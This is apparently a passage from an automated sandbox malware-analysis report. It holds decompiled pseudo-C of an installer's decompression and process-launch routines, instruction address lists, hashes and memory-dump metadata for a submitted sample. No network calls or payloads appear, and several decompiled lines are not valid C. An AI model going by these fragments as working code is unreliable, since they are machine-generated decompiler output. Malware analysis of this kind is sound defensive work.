                											__edx = __ebx + __ebx;
                											__ecx =  *(__ebp - 0x10);
                											__esi = __edx + __eax;
                											__ecx =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												_t217 = __edx + 1; // 0x1
                												__ebx = _t217;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L60;
                											} else {
                												goto L58;
                											}
                										case 0x10:
                											L109:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x10;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t365 = __ebp - 0x70;
                											 *_t365 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t365;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											goto L111;
                										case 0x11:
                											L69:
                											__esi =  *(__ebp - 0x58);
                											 *(__ebp - 0x84) = 0x12;
                											while(1) {
                												 *(_t613 - 0x54) = _t606;
                												goto L133;
                											}
                										case 0x12:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 0x58);
                												 *(__ebp - 0x84) = 0x13;
                												__esi =  *(__ebp - 0x58) + 2;
                												while(1) {
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											}
                											__eax =  *(__ebp - 0x4c);
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											__eflags = __eax;
                											__eax =  *(__ebp - 0x58) + __eax + 4;
                											goto L130;
                										case 0x13:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												_t469 = __ebp - 0x58;
                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                												__eflags =  *_t469;
                												 *(__ebp - 0x30) = 0x10;
                												 *(__ebp - 0x40) = 8;
                												L144:
                												 *(__ebp - 0x7c) = 0x14;
                												goto L145;
                											}
                											__eax =  *(__ebp - 0x4c);
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											 *(__ebp - 0x30) = 8;
                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                											L130:
                											 *(__ebp - 0x58) = __eax;
                											 *(__ebp - 0x40) = 3;
                											goto L144;
                										case 0x14:
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                											__eax =  *(__ebp - 0x80);
                											 *(_t613 - 0x88) = _t533;
                											goto L1;
                										case 0x15:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                											__al = __al & 0x000000fd;
                											__eax = (__eflags >= 0) - 1 + 0xb;
                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                											goto L120;
                										case 0x16:
                											__eax =  *(__ebp - 0x30);
                											__eflags = __eax - 4;
                											if(__eax >= 4) {
                												_push(3);
                												_pop(__eax);
                											}
                											__ecx =  *(__ebp - 4);
                											 *(__ebp - 0x40) = 6;
                											__eax = __eax << 7;
                											 *(__ebp - 0x7c) = 0x19;
                											 *(__ebp - 0x58) = __eax;
                											goto L145;
                										case 0x17:
                											L145:
                											__eax =  *(__ebp - 0x40);
                											 *(__ebp - 0x50) = 1;
                											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                											goto L149;
                										case 0x18:
                											L146:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x18;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t484 = __ebp - 0x70;
                											 *_t484 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t484;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L148:
                											_t487 = __ebp - 0x48;
                											 *_t487 =  *(__ebp - 0x48) - 1;
                											__eflags =  *_t487;
                											L149:
                											__eflags =  *(__ebp - 0x48);
                											if( *(__ebp - 0x48) <= 0) {
                												__ecx =  *(__ebp - 0x40);
                												__ebx =  *(__ebp - 0x50);
                												0 = 1;
                												__eax = 1 << __cl;
                												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                												__eax =  *(__ebp - 0x7c);
                												 *(__ebp - 0x44) = __ebx;
                												while(1) {
                													 *(_t613 - 0x88) = _t533;
                													goto L1;
                												}
                											}
                											__eax =  *(__ebp - 0x50);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                											__eax =  *(__ebp - 0x58);
                											__esi = __edx + __eax;
                											 *(__ebp - 0x54) = __esi;
                											__ax =  *__esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												__cx = __ax >> 5;
                												__eax = __eax - __ecx;
                												__edx = __edx + 1;
                												__eflags = __edx;
                												 *__esi = __ax;
                												 *(__ebp - 0x50) = __edx;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L148;
                											} else {
                												goto L146;
                											}
                										case 0x19:
                											__eflags = __ebx - 4;
                											if(__ebx < 4) {
                												 *(__ebp - 0x2c) = __ebx;
                												L119:
                												_t393 = __ebp - 0x2c;
                												 *_t393 =  *(__ebp - 0x2c) + 1;
                												__eflags =  *_t393;
                												L120:
                												__eax =  *(__ebp - 0x2c);
                												__eflags = __eax;
                												if(__eax == 0) {
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                													goto L170;
                												}
                												__eflags = __eax -  *(__ebp - 0x60);
                												if(__eax >  *(__ebp - 0x60)) {
                													goto L171;
                												}
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                												__eax =  *(__ebp - 0x30);
                												_t400 = __ebp - 0x60;
                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                												__eflags =  *_t400;
                												goto L123;
                											}
                											__ecx = __ebx;
                											__eax = __ebx;
                											__ecx = __ebx >> 1;
                											__eax = __ebx & 0x00000001;
                											__ecx = (__ebx >> 1) - 1;
                											__al = __al | 0x00000002;
                											__eax = (__ebx & 0x00000001) << __cl;
                											__eflags = __ebx - 0xe;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ebx >= 0xe) {
                												__ebx = 0;
                												 *(__ebp - 0x48) = __ecx;
                												L102:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__eax = __eax + __ebx;
                													 *(__ebp - 0x40) = 4;
                													 *(__ebp - 0x2c) = __eax;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x644;
                													__eflags = __eax;
                													L108:
                													__ebx = 0;
                													 *(__ebp - 0x58) = __eax;
                													 *(__ebp - 0x50) = 1;
                													 *(__ebp - 0x44) = 0;
                													 *(__ebp - 0x48) = 0;
                													L112:
                													__eax =  *(__ebp - 0x40);
                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                														_t391 = __ebp - 0x2c;
                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                														__eflags =  *_t391;
                														goto L119;
                													}
                													__eax =  *(__ebp - 0x50);
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                													__eax =  *(__ebp - 0x58);
                													__esi = __edi + __eax;
                													 *(__ebp - 0x54) = __esi;
                													__ax =  *__esi;
                													__ecx = __ax & 0x0000ffff;
                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                													__eflags =  *(__ebp - 0xc) - __edx;
                													if( *(__ebp - 0xc) >= __edx) {
                														__ecx = 0;
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                														__ecx = 1;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                														__ebx = 1;
                														__ecx =  *(__ebp - 0x48);
                														__ebx = 1 << __cl;
                														__ecx = 1 << __cl;
                														__ebx =  *(__ebp - 0x44);
                														__ebx =  *(__ebp - 0x44) | __ecx;
                														__cx = __ax;
                														__cx = __ax >> 5;
                														__eax = __eax - __ecx;
                														__edi = __edi + 1;
                														__eflags = __edi;
                														 *(__ebp - 0x44) = __ebx;
                														 *__esi = __ax;
                														 *(__ebp - 0x50) = __edi;
                													} else {
                														 *(__ebp - 0x10) = __edx;
                														0x800 = 0x800 - __ecx;
                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                														 *__esi = __dx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L111:
                														_t368 = __ebp - 0x48;
                														 *_t368 =  *(__ebp - 0x48) + 1;
                														__eflags =  *_t368;
                														goto L112;
                													} else {
                														goto L109;
                													}
                												}
                												__ecx =  *(__ebp - 0xc);
                												__ebx = __ebx + __ebx;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                													__ecx =  *(__ebp - 0x10);
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													__ebx = __ebx | 0x00000001;
                													__eflags = __ebx;
                													 *(__ebp - 0x44) = __ebx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													L101:
                													_t338 = __ebp - 0x48;
                													 *_t338 =  *(__ebp - 0x48) - 1;
                													__eflags =  *_t338;
                													goto L102;
                												} else {
                													goto L99;
                												}
                											}
                											__edx =  *(__ebp - 4);
                											__eax = __eax - __ebx;
                											 *(__ebp - 0x40) = __ecx;
                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                											goto L108;
                										case 0x1a:
                											L56:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1a;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x68);
                											__al =  *(__ebp - 0x5c);
                											__edx =  *(__ebp - 8);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                											 *( *(__ebp - 0x68)) = __al;
                											__ecx =  *(__ebp - 0x14);
                											 *(__ecx +  *(__ebp - 8)) = __al;
                											__eax = __ecx + 1;
                											__edx = 0;
                											_t192 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t192;
                											goto L79;
                										case 0x1b:
                											L75:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1b;
                												goto L170;
                											}
                											__eax =  *(__ebp - 0x14);
                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                											__eflags = __eax -  *(__ebp - 0x74);
                											if(__eax >=  *(__ebp - 0x74)) {
                												__eax = __eax +  *(__ebp - 0x74);
                												__eflags = __eax;
                											}
                											__edx =  *(__ebp - 8);
                											__cl =  *(__eax + __edx);
                											__eax =  *(__ebp - 0x14);
                											 *(__ebp - 0x5c) = __cl;
                											 *(__eax + __edx) = __cl;
                											__eax = __eax + 1;
                											__edx = 0;
                											_t274 = __eax %  *(__ebp - 0x74);
                											__eax = __eax /  *(__ebp - 0x74);
                											__edx = _t274;
                											__eax =  *(__ebp - 0x68);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                											_t283 = __ebp - 0x64;
                											 *_t283 =  *(__ebp - 0x64) - 1;
                											__eflags =  *_t283;
                											 *( *(__ebp - 0x68)) = __cl;
                											L79:
                											 *(__ebp - 0x14) = __edx;
                											goto L80;
                										case 0x1c:
                											while(1) {
                												L123:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													break;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t414 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t414;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                												__eflags =  *(__ebp - 0x30);
                												 *( *(__ebp - 0x68)) = __cl;
                												 *(__ebp - 0x14) = _t414;
                												if( *(__ebp - 0x30) > 0) {
                													continue;
                												} else {
                													L80:
                													 *(__ebp - 0x88) = 2;
                													goto L1;
                												}
                											}
                											 *(__ebp - 0x88) = 0x1c;
                											goto L170;
                									}
                								}
                								L171:
                								_t535 = _t534 | 0xffffffff;
                								goto L172;
                							}
                						}
                					}
                				}
                			}













                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x0040611c
                0x0040611c
                0x00406120
                0x0040688d
                0x00000000
                0x0040688d
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613b
                0x0040613e
                0x00406141
                0x00406141
                0x00406144
                0x00406147
                0x00000000
                0x00000000
                0x0040614d
                0x00406153
                0x00000000
                0x00000000
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406184
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b7
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c0
                0x004061c7
                0x004061ca
                0x00000000
                0x004061d0
                0x00000000
                0x004061d0
                0x00000000
                0x004061d5
                0x004061d5
                0x004061d9
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061fa
                0x004061fa
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x0040621d
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x00406248
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x0040624d
                0x00406254
                0x00406257
                0x00000000
                0x00406259
                0x00000000
                0x00406259
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x0040625e
                0x00000000
                0x00000000
                0x00406299
                0x00406299
                0x0040629d
                0x004068a5
                0x00000000
                0x004068a5
                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062b8
                0x004062bb
                0x004062be
                0x004062be
                0x004062c4
                0x00406262
                0x00406262
                0x00406265
                0x00000000
                0x00406265
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e1
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630c
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x0040631d
                0x00000000
                0x0040631d
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x00000000
                0x004066b9
                0x004066bd
                0x004066df
                0x004066e2
                0x004066ec
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x0040676b
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x0040676b
                0x0040676b
                0x00000000
                0x00406771
                0x0040676b
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004066f2
                0x004066ef

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                • Instruction ID: eed9497ed027258a65708919b4ea66700c8fb804c6c24b7440c20fb41b46c6b0
                • Opcode Fuzzy Hash: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                • Instruction Fuzzy Hash: 57715671D00229CFEF28CF98C844BADBBB1FB44305F15806AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00401E76() {
                				void* _t15;
                				void* _t24;
                				void* _t26;
                				void* _t31;
                
                				_t28 = E00402A85(_t24);
                				E00404E9F(0xffffffeb, _t13);
                				_t15 = E00405361(_t28); // executed
                				 *(_t31 + 8) = _t15;
                				if(_t15 == _t24) {
                					 *((intOrPtr*)(_t31 - 4)) = 1;
                				} else {
                					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                							E00405E13(0xf);
                						}
                						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x3c); // executed
                						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                							if( *(_t31 - 0x3c) != _t24) {
                								 *((intOrPtr*)(_t31 - 4)) = 1;
                							}
                						} else {
                							E00405A52(_t26,  *(_t31 - 0x3c));
                						}
                					}
                					_push( *(_t31 + 8));
                					CloseHandle();
                				}
                				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t31 - 4));
                				return 0;
                			}








                APIs
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                  • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                  • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                  • Part of subcall function 00405361: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                  • Part of subcall function 00405361: CloseHandle.KERNEL32(?), ref: 00405393
                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EB0
                • GetExitCodeProcess.KERNELBASE ref: 00401EC0
                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EE5
                Similarity
                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                • String ID:
                • API String ID: 3521207402-0
                • Opcode ID: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                • Instruction ID: 7da7f48acba4dd0e4cefddd12cfcc923695080b3e0b12fbb56f2b87fe8ee5a54
